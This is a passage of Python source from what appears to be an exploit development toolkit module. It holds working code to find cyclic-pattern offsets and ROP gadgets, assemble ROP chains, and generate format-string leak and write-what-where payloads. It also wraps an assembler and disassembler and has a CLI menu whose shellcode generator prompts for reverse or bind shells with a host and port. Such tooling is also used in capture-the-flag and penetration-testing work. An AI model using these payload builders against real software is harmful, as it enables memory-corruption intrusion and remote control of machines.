uppers = string.ascii_uppercase
|
|
lowers = string.ascii_lowercase
|
|
digits = string.digits
|
|
|
|
pattern = []
|
|
for u in uppers:
|
|
for l in lowers:
|
|
for d in digits:
|
|
pattern.append(u + l + d)
|
|
if len(''.join(pattern)) >= length:
|
|
return ''.join(pattern)[:length]
|
|
return ''.join(pattern)[:length]
|
|
|
|
def find_pattern_offset(self, value, length=20000):
|
|
"""Find the offset of a value within a cyclic pattern.
|
|
|
|
Args:
|
|
value: hex string (e.g. '41326241'), integer, or raw string
|
|
length: pattern length to search within
|
|
|
|
Returns:
|
|
dict with offset and matching details
|
|
"""
|
|
pattern = self._debruijn_pattern(min(int(length), 20280))
|
|
|
|
# Try to interpret value
|
|
search_strings = []
|
|
|
|
if isinstance(value, str):
|
|
value = value.strip()
|
|
|
|
# Hex: 0x prefix or pure hex
|
|
if value.startswith('0x') or value.startswith('0X'):
|
|
hex_str = value[2:]
|
|
if len(hex_str) % 2 != 0:
|
|
hex_str = '0' + hex_str
|
|
try:
|
|
raw = bytes.fromhex(hex_str)
|
|
search_strings.append(raw.decode('ascii', errors='replace'))
|
|
# Also try reversed (little-endian)
|
|
search_strings.append(raw[::-1].decode('ascii', errors='replace'))
|
|
except (ValueError, UnicodeDecodeError):
|
|
pass
|
|
elif all(c in '0123456789abcdefABCDEF' for c in value) and len(value) >= 4:
|
|
# Pure hex without prefix
|
|
try:
|
|
raw = bytes.fromhex(value)
|
|
search_strings.append(raw.decode('ascii', errors='replace'))
|
|
search_strings.append(raw[::-1].decode('ascii', errors='replace'))
|
|
except (ValueError, UnicodeDecodeError):
|
|
pass
|
|
|
|
# Integer
|
|
try:
|
|
int_val = int(value, 0)
|
|
for width in (4, 8):
|
|
try:
|
|
packed_le = struct.pack(f'<{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1))
|
|
search_strings.append(packed_le.decode('ascii', errors='replace'))
|
|
packed_be = struct.pack(f'>{"I" if width == 4 else "Q"}', int_val & (2**(width*8)-1))
|
|
search_strings.append(packed_be.decode('ascii', errors='replace'))
|
|
except (struct.error, OverflowError):
|
|
pass
|
|
except (ValueError, OverflowError):
|
|
pass
|
|
|
|
# Direct string search
|
|
search_strings.append(value)
|
|
|
|
elif isinstance(value, int):
|
|
for width in (4, 8):
|
|
try:
|
|
packed = struct.pack(f'<{"I" if width == 4 else "Q"}', value & (2**(width*8)-1))
|
|
search_strings.append(packed.decode('ascii', errors='replace'))
|
|
except (struct.error, OverflowError):
|
|
pass
|
|
|
|
# Search
|
|
for needle in search_strings:
|
|
offset = pattern.find(needle)
|
|
if offset != -1:
|
|
return {
|
|
'offset': offset,
|
|
'value': value if isinstance(value, str) else hex(value),
|
|
'matched': needle,
|
|
'matched_hex': needle.encode('ascii', errors='replace').hex(),
|
|
'endian': 'little-endian' if search_strings.index(needle) % 2 == 1 else 'big-endian',
|
|
'pattern_length': len(pattern),
|
|
}
|
|
|
|
return {
|
|
'offset': -1,
|
|
'error': f'Value {value} not found in pattern of length {len(pattern)}',
|
|
'value': str(value),
|
|
'pattern_length': len(pattern),
|
|
}
|
|
|
|
# -----------------------------------------------------------------------
|
|
# ROP Gadget Finding
|
|
# -----------------------------------------------------------------------
|
|
|
|
def find_rop_gadgets(self, binary_path, gadget_type=None, max_gadgets=200):
|
|
"""Find ROP gadgets in a binary.
|
|
|
|
Args:
|
|
binary_path: path to ELF/PE binary
|
|
gadget_type: None (all), pop_ret, xchg, mov, syscall, jmp_esp, call_reg
|
|
max_gadgets: maximum gadgets to return
|
|
|
|
Returns:
|
|
dict with list of gadgets
|
|
"""
|
|
if not os.path.isfile(binary_path):
|
|
return {'error': f'File not found: {binary_path}'}
|
|
|
|
# Try ropper first
|
|
ropper_path = find_tool('ropper')
|
|
if ropper_path:
|
|
return self._find_gadgets_ropper(binary_path, gadget_type, max_gadgets)
|
|
|
|
# Try ROPgadget
|
|
ropgadget_path = find_tool('ROPgadget')
|
|
if ropgadget_path:
|
|
return self._find_gadgets_ropgadget(binary_path, gadget_type, max_gadgets)
|
|
|
|
# Fallback: objdump + regex
|
|
objdump_path = find_tool('objdump')
|
|
if objdump_path:
|
|
return self._find_gadgets_objdump(binary_path, gadget_type, max_gadgets)
|
|
|
|
return {'error': 'No disassembler found. Install ropper, ROPgadget, or objdump.'}
|
|
|
|
def _find_gadgets_ropper(self, binary_path, gadget_type, max_gadgets):
|
|
"""Find gadgets using ropper."""
|
|
cmd = [find_tool('ropper'), '-f', binary_path, '--nocolor']
|
|
if gadget_type:
|
|
search_map = {
|
|
'pop_ret': 'pop',
|
|
'xchg': 'xchg',
|
|
'mov': 'mov',
|
|
'syscall': 'syscall',
|
|
'jmp_esp': 'jmp esp',
|
|
'call_reg': 'call',
|
|
}
|
|
search_term = search_map.get(gadget_type, gadget_type)
|
|
cmd.extend(['--search', search_term])
|
|
|
|
try:
|
|
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
|
|
lines = result.stdout.strip().split('\n')
|
|
except (subprocess.TimeoutExpired, FileNotFoundError):
|
|
return {'error': 'ropper execution failed'}
|
|
|
|
gadgets = []
|
|
for line in lines:
|
|
line = line.strip()
|
|
if not line or line.startswith('=') or line.startswith('Gadgets') or line.startswith('['):
|
|
continue
|
|
# Parse: 0xaddress: instruction; instruction; ret;
|
|
match = re.match(r'(0x[0-9a-fA-F]+):\s+(.*)', line)
|
|
if match:
|
|
addr = match.group(1)
|
|
instr = match.group(2).strip().rstrip(';').strip()
|
|
gtype = self._classify_gadget(instr)
|
|
gadgets.append({
|
|
'address': addr,
|
|
'gadget': instr,
|
|
'type': gtype,
|
|
})
|
|
if len(gadgets) >= max_gadgets:
|
|
break
|
|
|
|
return {
|
|
'binary': binary_path,
|
|
'tool': 'ropper',
|
|
'count': len(gadgets),
|
|
'gadgets': gadgets,
|
|
}
|
|
|
|
def _find_gadgets_ropgadget(self, binary_path, gadget_type, max_gadgets):
|
|
"""Find gadgets using ROPgadget."""
|
|
cmd = [find_tool('ROPgadget'), '--binary', binary_path]
|
|
|
|
try:
|
|
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
|
|
lines = result.stdout.strip().split('\n')
|
|
except (subprocess.TimeoutExpired, FileNotFoundError):
|
|
return {'error': 'ROPgadget execution failed'}
|
|
|
|
gadgets = []
|
|
for line in lines:
|
|
line = line.strip()
|
|
match = re.match(r'(0x[0-9a-fA-F]+)\s+:\s+(.*)', line)
|
|
if match:
|
|
addr = match.group(1)
|
|
instr = match.group(2).strip()
|
|
gtype = self._classify_gadget(instr)
|
|
if gadget_type and gtype != gadget_type:
|
|
continue
|
|
gadgets.append({
|
|
'address': addr,
|
|
'gadget': instr,
|
|
'type': gtype,
|
|
})
|
|
if len(gadgets) >= max_gadgets:
|
|
break
|
|
|
|
return {
|
|
'binary': binary_path,
|
|
'tool': 'ROPgadget',
|
|
'count': len(gadgets),
|
|
'gadgets': gadgets,
|
|
}
|
|
|
|
def _find_gadgets_objdump(self, binary_path, gadget_type, max_gadgets):
|
|
"""Find gadgets using objdump disassembly + regex search."""
|
|
objdump = find_tool('objdump')
|
|
try:
|
|
result = subprocess.run(
|
|
[objdump, '-d', '-M', 'intel', binary_path],
|
|
capture_output=True, text=True, timeout=120
|
|
)
|
|
disasm = result.stdout
|
|
except (subprocess.TimeoutExpired, FileNotFoundError):
|
|
return {'error': 'objdump execution failed'}
|
|
|
|
# Parse disassembly for gadget-ending instructions
|
|
gadget_endings = {
|
|
'ret': re.compile(r'ret\s*$'),
|
|
'syscall': re.compile(r'syscall\s*$'),
|
|
'int 0x80': re.compile(r'int\s+0x80\s*$'),
|
|
}
|
|
|
|
lines = disasm.split('\n')
|
|
gadgets = []
|
|
|
|
for i, line in enumerate(lines):
|
|
line = line.strip()
|
|
# Check if this line ends a gadget
|
|
for ending_name, ending_re in gadget_endings.items():
|
|
instr_match = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', line)
|
|
if not instr_match:
|
|
continue
|
|
instr_text = instr_match.group(3).strip()
|
|
if not ending_re.search(instr_text):
|
|
continue
|
|
|
|
addr = instr_match.group(1)
|
|
|
|
# Look back up to 5 instructions for the gadget chain
|
|
chain = []
|
|
for j in range(max(0, i - 5), i + 1):
|
|
prev = lines[j].strip()
|
|
pm = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', prev)
|
|
if pm:
|
|
chain.append(pm.group(3).strip())
|
|
|
|
for start_idx in range(len(chain)):
|
|
gadget_str = ' ; '.join(chain[start_idx:])
|
|
gtype = self._classify_gadget(gadget_str)
|
|
if gadget_type and gtype != gadget_type:
|
|
continue
|
|
|
|
# Get the address of the first instruction
|
|
lookback = lines[max(0, i - 5) + start_idx].strip()
|
|
am = re.match(r'\s*([0-9a-fA-F]+):', lookback)
|
|
gaddr = f'0x{am.group(1)}' if am else f'0x{addr}'
|
|
|
|
gadgets.append({
|
|
'address': gaddr,
|
|
'gadget': gadget_str,
|
|
'type': gtype,
|
|
})
|
|
if len(gadgets) >= max_gadgets:
|
|
break
|
|
if len(gadgets) >= max_gadgets:
|
|
break
|
|
if len(gadgets) >= max_gadgets:
|
|
break
|
|
|
|
# Deduplicate
|
|
seen = set()
|
|
unique = []
|
|
for g in gadgets:
|
|
key = g['address'] + g['gadget']
|
|
if key not in seen:
|
|
seen.add(key)
|
|
unique.append(g)
|
|
|
|
return {
|
|
'binary': binary_path,
|
|
'tool': 'objdump',
|
|
'count': len(unique),
|
|
'gadgets': unique,
|
|
}
|
|
|
|
def _classify_gadget(self, gadget_str):
|
|
"""Classify a gadget by its instruction pattern."""
|
|
g = gadget_str.lower()
|
|
if re.search(r'pop\s+\w+.*ret', g):
|
|
return 'pop_ret'
|
|
if 'xchg' in g:
|
|
return 'xchg'
|
|
if 'syscall' in g or 'int 0x80' in g:
|
|
return 'syscall'
|
|
if re.search(r'jmp\s+(esp|rsp)', g):
|
|
return 'jmp_esp'
|
|
if re.search(r'call\s+(eax|ebx|ecx|edx|esi|edi|rax|rbx|rcx|rdx|rsi|rdi|r\d+)', g):
|
|
return 'call_reg'
|
|
if 'mov' in g:
|
|
return 'mov'
|
|
if 'ret' in g:
|
|
return 'ret'
|
|
return 'other'
|
|
|
|
# -----------------------------------------------------------------------
|
|
# ROP Chain Builder
|
|
# -----------------------------------------------------------------------
|
|
|
|
def build_rop_chain(self, gadgets, chain_spec):
|
|
"""Assemble a ROP chain from gadgets and a chain specification.
|
|
|
|
Args:
|
|
gadgets: list of gadget dicts (address, gadget, type)
|
|
chain_spec: list of dicts describing desired chain:
|
|
[
|
|
{'gadget_type': 'pop_ret', 'register': 'rdi', 'value': '0x...'},
|
|
{'gadget_type': 'pop_ret', 'register': 'rsi', 'value': '0x...'},
|
|
{'gadget_type': 'syscall'},
|
|
...
|
|
]
|
|
|
|
Returns:
|
|
dict with chain bytes, addresses, and debug info
|
|
"""
|
|
if not gadgets:
|
|
return {'error': 'No gadgets provided'}
|
|
if not chain_spec:
|
|
return {'error': 'No chain specification provided'}
|
|
|
|
# Index gadgets by type
|
|
by_type = {}
|
|
for g in gadgets:
|
|
gtype = g.get('type', 'other')
|
|
by_type.setdefault(gtype, []).append(g)
|
|
|
|
chain_addrs = []
|
|
chain_bytes = b''
|
|
debug_lines = []
|
|
|
|
for step in chain_spec:
|
|
gtype = step.get('gadget_type', step.get('type', 'pop_ret'))
|
|
register = step.get('register', '').lower()
|
|
value = step.get('value', '0')
|
|
|
|
# Find matching gadget
|
|
candidates = by_type.get(gtype, [])
|
|
if register:
|
|
# Filter by register in gadget text
|
|
reg_candidates = [g for g in candidates if register in g['gadget'].lower()]
|
|
if reg_candidates:
|
|
candidates = reg_candidates
|
|
|
|
if not candidates:
|
|
debug_lines.append(f'[!] No gadget found for: {gtype} {register}')
|
|
continue
|
|
|
|
gadget = candidates[0] # Use first match
|
|
addr_int = int(gadget['address'], 16)
|
|
|
|
# Determine address width (4 or 8 bytes)
|
|
if addr_int > 0xFFFFFFFF:
|
|
addr_bytes = struct.pack('<Q', addr_int)
|
|
else:
|
|
addr_bytes = struct.pack('<I', addr_int)
|
|
|
|
chain_bytes += addr_bytes
|
|
chain_addrs.append(gadget['address'])
|
|
debug_lines.append(f'[+] {gadget["address"]}: {gadget["gadget"]}')
|
|
|
|
# If pop_ret, add the value to be popped
|
|
if gtype == 'pop_ret' and 'value' in step:
|
|
val_int = int(value, 0) if isinstance(value, str) else int(value)
|
|
if addr_int > 0xFFFFFFFF:
|
|
chain_bytes += struct.pack('<Q', val_int & 0xFFFFFFFFFFFFFFFF)
|
|
else:
|
|
chain_bytes += struct.pack('<I', val_int & 0xFFFFFFFF)
|
|
debug_lines.append(f' => 0x{val_int:x}')
|
|
|
|
return {
|
|
'chain_hex': chain_bytes.hex(),
|
|
'chain_length': len(chain_bytes),
|
|
'addresses': chain_addrs,
|
|
'steps': len(chain_spec),
|
|
'matched': len(chain_addrs),
|
|
'debug': '\n'.join(debug_lines),
|
|
'python': self._chain_to_python(chain_bytes),
|
|
}
|
|
|
|
def _chain_to_python(self, chain_bytes):
|
|
"""Convert chain bytes to Python struct.pack() calls."""
|
|
lines = ['from struct import pack', '', 'chain = b""']
|
|
width = 8 if len(chain_bytes) > 4 and len(chain_bytes) % 8 == 0 else 4
|
|
fmt = '<Q' if width == 8 else '<I'
|
|
for i in range(0, len(chain_bytes), width):
|
|
chunk = chain_bytes[i:i + width]
|
|
if len(chunk) == width:
|
|
val = struct.unpack(fmt, chunk)[0]
|
|
lines.append(f'chain += pack("{fmt}", 0x{val:x})')
|
|
return '\n'.join(lines)
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Format String Exploitation
|
|
# -----------------------------------------------------------------------
|
|
|
|
def format_string_offset(self, binary_path=None, test_count=20):
|
|
"""Generate format string test payloads for offset discovery.
|
|
|
|
Args:
|
|
binary_path: optional binary path (unused, for UI consistency)
|
|
test_count: number of %p/%x probes to generate
|
|
|
|
Returns:
|
|
dict with test payloads for each format specifier
|
|
"""
|
|
test_count = min(int(test_count), 100)
|
|
|
|
payloads = {
|
|
'pointer_leak': {
|
|
'payload': '.'.join(f'%{i}$p' for i in range(1, test_count + 1)),
|
|
'description': 'Leak stack pointers at each offset',
|
|
},
|
|
'hex_leak': {
|
|
'payload': '.'.join(f'%{i}$x' for i in range(1, test_count + 1)),
|
|
'description': 'Leak stack values as hex (32-bit)',
|
|
},
|
|
'long_hex_leak': {
|
|
'payload': '.'.join(f'%{i}$lx' for i in range(1, test_count + 1)),
|
|
'description': 'Leak stack values as long hex (64-bit)',
|
|
},
|
|
'string_probe': {
|
|
'payload': '|'.join(f'%{i}$s' for i in range(1, min(test_count, 10) + 1)),
|
|
'description': 'Attempt to read strings (may crash — use with caution)',
|
|
},
|
|
'marker_test': {
|
|
'payload': 'AAAA' + '.'.join(f'%{i}$x' for i in range(1, test_count + 1)),
|
|
'description': 'Find AAAA (0x41414141) marker on stack to determine input offset',
|
|
},
|
|
}
|
|
|
|
return {
|
|
'payloads': payloads,
|
|
'test_count': test_count,
|
|
'note': 'Feed each payload to the vulnerable printf-like function. '
|
|
'The offset where your marker appears is your format string offset.',
|
|
}
|
|
|
|
def format_string_write(self, address, value, offset):
|
|
"""Generate a write-what-where format string payload.
|
|
|
|
Args:
|
|
address: target address to write to (hex string or int)
|
|
value: value to write (hex string or int)
|
|
offset: format string offset where input appears on stack
|
|
|
|
Returns:
|
|
dict with 32-bit and 64-bit payloads
|
|
"""
|
|
if isinstance(address, str):
|
|
address = int(address, 0)
|
|
if isinstance(value, str):
|
|
value = int(value, 0)
|
|
offset = int(offset)
|
|
|
|
results = {}
|
|
|
|
# 32-bit write (write 4 bytes as two %hn writes)
|
|
low_word = value & 0xFFFF
|
|
high_word = (value >> 16) & 0xFFFF
|
|
|
|
addr_low = struct.pack('<I', address)
|
|
addr_high = struct.pack('<I', address + 2)
|
|
|
|
# Sort writes by value to minimise padding
|
|
writes = sorted([
|
|
(low_word, addr_low, offset),
|
|
(high_word, addr_high, offset + 1),
|
|
], key=lambda x: x[0])
|
|
|
|
payload_parts_32 = []
|
|
current = 0
|
|
for val, addr, off in writes:
|
|
pad = (val - current) % 0x10000
|
|
if pad > 0:
|
|
payload_parts_32.append(f'%{pad}c')
|
|
payload_parts_32.append(f'%{off}$hn')
|
|
current = val
|
|
|
|
payload_32 = addr_low.hex() + addr_high.hex() + ''.join(payload_parts_32)
|
|
results['payload_32bit'] = {
|
|
'payload': payload_32,
|
|
'description': f'Write 0x{value:08x} to 0x{address:08x} (32-bit, two %hn writes)',
|
|
'addresses': f'0x{address:08x}, 0x{address + 2:08x}',
|
|
}
|
|
|
|
# 64-bit write (write 8 bytes as four %hn writes)
|
|
words_64 = []
|
|
for i in range(4):
|
|
word = (value >> (i * 16)) & 0xFFFF
|
|
addr_part = struct.pack('<Q', address + i * 2)
|
|
words_64.append((word, addr_part, offset + i))
|
|
|
|
words_64.sort(key=lambda x: x[0])
|
|
payload_parts_64 = []
|
|
current = 0
|
|
for val, addr, off in words_64:
|
|
pad = (val - current) % 0x10000
|
|
if pad > 0:
|
|
payload_parts_64.append(f'%{pad}c')
|
|
payload_parts_64.append(f'%{off}$hn')
|
|
current = val
|
|
|
|
addrs_hex = ''.join(w[1].hex() for w in words_64)
|
|
payload_64 = addrs_hex + ''.join(payload_parts_64)
|
|
results['payload_64bit'] = {
|
|
'payload': payload_64,
|
|
'description': f'Write 0x{value:016x} to 0x{address:016x} (64-bit, four %hn writes)',
|
|
}
|
|
|
|
return results
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Assembly / Disassembly
|
|
# -----------------------------------------------------------------------
|
|
|
|
def assemble(self, code, arch='x64'):
|
|
"""Assemble assembly code to machine code bytes.
|
|
|
|
Args:
|
|
code: assembly source (NASM syntax)
|
|
arch: x86, x64, arm
|
|
|
|
Returns:
|
|
dict with hex bytes, raw length, and disassembly
|
|
"""
|
|
if not code or not code.strip():
|
|
return {'error': 'No assembly code provided'}
|
|
|
|
arch = arch.lower().strip()
|
|
nasm = find_tool('nasm')
|
|
objcopy = find_tool('objcopy')
|
|
|
|
if nasm and objcopy:
|
|
return self._assemble_nasm(code, arch, nasm, objcopy)
|
|
|
|
# Try keystone-engine
|
|
try:
|
|
import keystone
|
|
return self._assemble_keystone(code, arch)
|
|
except ImportError:
|
|
pass
|
|
|
|
return {
|
|
'error': 'No assembler available. Install nasm + objcopy, or pip install keystone-engine.'
|
|
}
|
|
|
|
def _assemble_nasm(self, code, arch, nasm_path, objcopy_path):
|
|
"""Assemble using NASM."""
|
|
# Set BITS directive based on arch
|
|
bits_map = {'x86': '32', 'x64': '64', 'i386': '32', 'amd64': '64'}
|
|
bits = bits_map.get(arch, '64')
|
|
|
|
# Prepend BITS directive if not already present
|
|
if 'bits' not in code.lower():
|
|
code = f'BITS {bits}\n{code}'
|
|
|
|
with tempfile.NamedTemporaryFile(suffix='.asm', mode='w', delete=False) as f:
|
|
f.write(code)
|
|
asm_path = f.name
|
|
|
|
obj_path = asm_path.replace('.asm', '.o')
|
|
bin_path = asm_path.replace('.asm', '.bin')
|
|
|
|
try:
|
|
# Assemble
|
|
result = subprocess.run(
|
|
[nasm_path, '-f', 'bin', '-o', bin_path, asm_path],
|
|
capture_output=True, text=True, timeout=10
|
|
)
|
|
if result.returncode != 0:
|
|
return {'error': f'NASM error: {result.stderr.strip()}'}
|
|
|
|
# Read binary output
|
|
with open(bin_path, 'rb') as bf:
|
|
machine_code = bf.read()
|
|
|
|
return {
|
|
'hex': machine_code.hex(),
|
|
'bytes': list(machine_code),
|
|
'length': len(machine_code),
|
|
'arch': arch,
|
|
'c_array': ', '.join(f'0x{b:02x}' for b in machine_code),
|
|
'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"',
|
|
}
|
|
|
|
except subprocess.TimeoutExpired:
|
|
return {'error': 'Assembly timed out'}
|
|
finally:
|
|
for p in (asm_path, obj_path, bin_path):
|
|
try:
|
|
os.unlink(p)
|
|
except OSError:
|
|
pass
|
|
|
|
def _assemble_keystone(self, code, arch):
|
|
"""Assemble using keystone-engine."""
|
|
import keystone
|
|
|
|
arch_map = {
|
|
'x86': (keystone.KS_ARCH_X86, keystone.KS_MODE_32),
|
|
'x64': (keystone.KS_ARCH_X86, keystone.KS_MODE_64),
|
|
'arm': (keystone.KS_ARCH_ARM, keystone.KS_MODE_ARM),
|
|
}
|
|
ks_arch, ks_mode = arch_map.get(arch, (keystone.KS_ARCH_X86, keystone.KS_MODE_64))
|
|
|
|
try:
|
|
ks = keystone.Ks(ks_arch, ks_mode)
|
|
encoding, count = ks.asm(code)
|
|
machine_code = bytes(encoding)
|
|
|
|
return {
|
|
'hex': machine_code.hex(),
|
|
'bytes': list(machine_code),
|
|
'length': len(machine_code),
|
|
'arch': arch,
|
|
'instructions': count,
|
|
'c_array': ', '.join(f'0x{b:02x}' for b in machine_code),
|
|
'python': 'b"' + ''.join(f'\\x{b:02x}' for b in machine_code) + '"',
|
|
}
|
|
except keystone.KsError as e:
|
|
return {'error': f'Keystone error: {e}'}
|
|
|
|
def disassemble(self, data, arch='x64', offset=0):
|
|
"""Disassemble machine code bytes to assembly.
|
|
|
|
Args:
|
|
data: hex string or bytes
|
|
arch: x86, x64, arm
|
|
offset: base address offset
|
|
|
|
Returns:
|
|
dict with disassembly listing
|
|
"""
|
|
if isinstance(data, str):
|
|
data = data.strip().replace(' ', '').replace('\\x', '')
|
|
try:
|
|
data = bytes.fromhex(data)
|
|
except ValueError:
|
|
return {'error': 'Invalid hex data'}
|
|
|
|
if not data:
|
|
return {'error': 'No data to disassemble'}
|
|
|
|
arch = arch.lower().strip()
|
|
offset = int(offset)
|
|
|
|
# Try capstone first
|
|
try:
|
|
import capstone
|
|
return self._disasm_capstone(data, arch, offset)
|
|
except ImportError:
|
|
pass
|
|
|
|
# Fallback to objdump
|
|
objdump = find_tool('objdump')
|
|
if objdump:
|
|
return self._disasm_objdump(data, arch, offset)
|
|
|
|
# Last resort: manual byte-by-byte display
|
|
return self._disasm_basic(data, arch, offset)
|
|
|
|
def _disasm_capstone(self, data, arch, offset):
|
|
"""Disassemble using capstone."""
|
|
import capstone
|
|
|
|
arch_map = {
|
|
'x86': (capstone.CS_ARCH_X86, capstone.CS_MODE_32),
|
|
'x64': (capstone.CS_ARCH_X86, capstone.CS_MODE_64),
|
|
'arm': (capstone.CS_ARCH_ARM, capstone.CS_MODE_ARM),
|
|
}
|
|
cs_arch, cs_mode = arch_map.get(arch, (capstone.CS_ARCH_X86, capstone.CS_MODE_64))
|
|
|
|
md = capstone.Cs(cs_arch, cs_mode)
|
|
md.detail = False
|
|
|
|
instructions = []
|
|
for addr, size, mnemonic, op_str in md.disasm_lite(data, offset):
|
|
instr_bytes = data[addr - offset:addr - offset + size]
|
|
instructions.append({
|
|
'address': f'0x{addr:08x}',
|
|
'bytes': instr_bytes.hex(),
|
|
'mnemonic': mnemonic,
|
|
'operands': op_str,
|
|
'text': f'{mnemonic} {op_str}'.strip(),
|
|
})
|
|
|
|
listing = '\n'.join(
|
|
f'{i["address"]}: {i["bytes"]:<20s} {i["text"]}'
|
|
for i in instructions
|
|
)
|
|
|
|
return {
|
|
'instructions': instructions,
|
|
'listing': listing,
|
|
'count': len(instructions),
|
|
'arch': arch,
|
|
'tool': 'capstone',
|
|
'data_length': len(data),
|
|
}
|
|
|
|
def _disasm_objdump(self, data, arch, offset):
|
|
"""Disassemble using objdump."""
|
|
objdump = find_tool('objdump')
|
|
|
|
with tempfile.NamedTemporaryFile(suffix='.bin', delete=False) as f:
|
|
f.write(data)
|
|
bin_path = f.name
|
|
|
|
arch_map = {'x86': 'i386', 'x64': 'i386:x86-64', 'arm': 'arm'}
|
|
obj_arch = arch_map.get(arch, 'i386:x86-64')
|
|
|
|
try:
|
|
result = subprocess.run(
|
|
[objdump, '-D', '-b', 'binary', '-m', obj_arch,
|
|
'-M', 'intel', '--adjust-vma', str(offset), bin_path],
|
|
capture_output=True, text=True, timeout=10
|
|
)
|
|
lines = result.stdout.strip().split('\n')
|
|
|
|
instructions = []
|
|
for line in lines:
|
|
match = re.match(r'\s*([0-9a-fA-F]+):\s+((?:[0-9a-fA-F]{2}\s)+)\s+(.*)', line)
|
|
if match:
|
|
addr = match.group(1)
|
|
raw_bytes = match.group(2).strip()
|
|
instr = match.group(3).strip()
|
|
instructions.append({
|
|
'address': f'0x{addr}',
|
|
'bytes': raw_bytes.replace(' ', ''),
|
|
'text': instr,
|
|
})
|
|
|
|
listing = '\n'.join(
|
|
f'{i["address"]}: {i["bytes"]:<20s} {i["text"]}'
|
|
for i in instructions
|
|
)
|
|
|
|
return {
|
|
'instructions': instructions,
|
|
'listing': listing,
|
|
'count': len(instructions),
|
|
'arch': arch,
|
|
'tool': 'objdump',
|
|
'data_length': len(data),
|
|
}
|
|
except subprocess.TimeoutExpired:
|
|
return {'error': 'Disassembly timed out'}
|
|
finally:
|
|
try:
|
|
os.unlink(bin_path)
|
|
except OSError:
|
|
pass
|
|
|
|
def _disasm_basic(self, data, arch, offset):
|
|
"""Basic hex dump when no disassembler is available."""
|
|
listing_lines = []
|
|
for i in range(0, len(data), 16):
|
|
chunk = data[i:i + 16]
|
|
addr = offset + i
|
|
hex_part = ' '.join(f'{b:02x}' for b in chunk)
|
|
ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
|
|
listing_lines.append(f'0x{addr:08x}: {hex_part:<48s} {ascii_part}')
|
|
|
|
return {
|
|
'instructions': [],
|
|
'listing': '\n'.join(listing_lines),
|
|
'count': 0,
|
|
'arch': arch,
|
|
'tool': 'hex_dump (no disassembler available)',
|
|
'data_length': len(data),
|
|
'note': 'Install capstone or objdump for proper disassembly.',
|
|
}
|
|
|
|
# -----------------------------------------------------------------------
|
|
# Hex Dump
|
|
# -----------------------------------------------------------------------
|
|
|
|
def hex_dump(self, data, offset=0):
|
|
"""Format bytes as a hex dump with ASCII sidebar.
|
|
|
|
Args:
|
|
data: bytes or hex string
|
|
offset: starting address offset
|
|
|
|
Returns:
|
|
dict with formatted hex dump string
|
|
"""
|
|
if isinstance(data, str):
|
|
data = bytes.fromhex(data.replace(' ', '').replace('\\x', ''))
|
|
|
|
lines = []
|
|
for i in range(0, len(data), 16):
|
|
chunk = data[i:i + 16]
|
|
addr = offset + i
|
|
hex_part = ' '.join(f'{b:02x}' for b in chunk)
|
|
# Pad short lines
|
|
hex_part = f'{hex_part:<48s}'
|
|
ascii_part = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
|
|
lines.append(f'{addr:08x} {hex_part} |{ascii_part}|')
|
|
|
|
return {
|
|
'dump': '\n'.join(lines),
|
|
'length': len(data),
|
|
'offset': offset,
|
|
}
|
|
|
|
# -----------------------------------------------------------------------
|
|
# CLI interface
|
|
# -----------------------------------------------------------------------
|
|
|
|
|
|
def run():
|
|
"""CLI menu for exploit development toolkit."""
|
|
dev = get_exploit_dev()
|
|
|
|
while True:
|
|
clear_screen()
|
|
display_banner()
|
|
print(f"\n{Colors.RED}{Colors.BOLD} Exploit Development Toolkit{Colors.RESET}")
|
|
print(f"{Colors.DIM} Shellcode, encoders, ROP chains, patterns{Colors.RESET}")
|
|
print(f"\n{Colors.CYAN} 1{Colors.RESET} Shellcode Generator")
|
|
print(f"{Colors.CYAN} 2{Colors.RESET} Payload Encoder")
|
|
print(f"{Colors.CYAN} 3{Colors.RESET} Pattern Create")
|
|
print(f"{Colors.CYAN} 4{Colors.RESET} Pattern Offset")
|
|
print(f"{Colors.CYAN} 5{Colors.RESET} ROP Gadgets")
|
|
print(f"{Colors.CYAN} 6{Colors.RESET} Disassemble")
|
|
print(f"{Colors.CYAN} 0{Colors.RESET} Back")
|
|
|
|
choice = input(f"\n{Colors.WHITE} [{Colors.RED}exploit-dev{Colors.WHITE}]> {Colors.RESET}").strip()
|
|
|
|
if choice == '0':
|
|
break
|
|
elif choice == '1':
|
|
_cli_shellcode(dev)
|
|
elif choice == '2':
|
|
_cli_encoder(dev)
|
|
elif choice == '3':
|
|
_cli_pattern_create(dev)
|
|
elif choice == '4':
|
|
_cli_pattern_offset(dev)
|
|
elif choice == '5':
|
|
_cli_rop_gadgets(dev)
|
|
elif choice == '6':
|
|
_cli_disassemble(dev)
|
|
|
|
|
|
def _cli_shellcode(dev):
|
|
"""CLI: Shellcode generator."""
|
|
print(f"\n{Colors.BOLD}Available shellcode templates:{Colors.RESET}")
|
|
for sc in dev.list_shellcodes():
|
|
print(f" {Colors.CYAN}{sc['name']}{Colors.RESET} — {sc['description']} ({sc['length']} bytes)")
|
|
|
|
shell_type = input(f"\n{Colors.WHITE}Shell type (reverse_shell/bind_shell/execve): {Colors.RESET}").strip() or 'execve'
|
|
arch = input(f"{Colors.WHITE}Architecture (x86/x64/arm): {Colors.RESET}").strip() or 'x64'
|
|
platform = input(f"{Colors.WHITE}Platform (linux/windows): {Colors.RESET}").strip() or 'linux'
|
|
host = input(f"{Colors.WHITE}Host IP (for reverse/bind, or skip): {Colors.RESET}").strip()
|
|
port = input(f"{Colors.WHITE}Port (for reverse/bind, or skip): {Colors.RESET}").strip()
|
|
fmt = input(f"{Colors.WHITE}Output format (hex/c_array/python/nasm): {Colors.RESET}").strip() or 'hex'
|
|
|
|
result = dev.generate_shellcode(shell_type, arch, host or None, port or None, platform, output_format=fmt)
|
|
if 'error' in result:
|
|
print(f"\n{Colors.RED}Error: {result['error']}{Colors.RESET}")
|
|
else:
|
|
print(f"\n{Colors.GREEN}[+] Generated {result['length']} bytes ({result['template']}){Colors.RESET}")
|
|
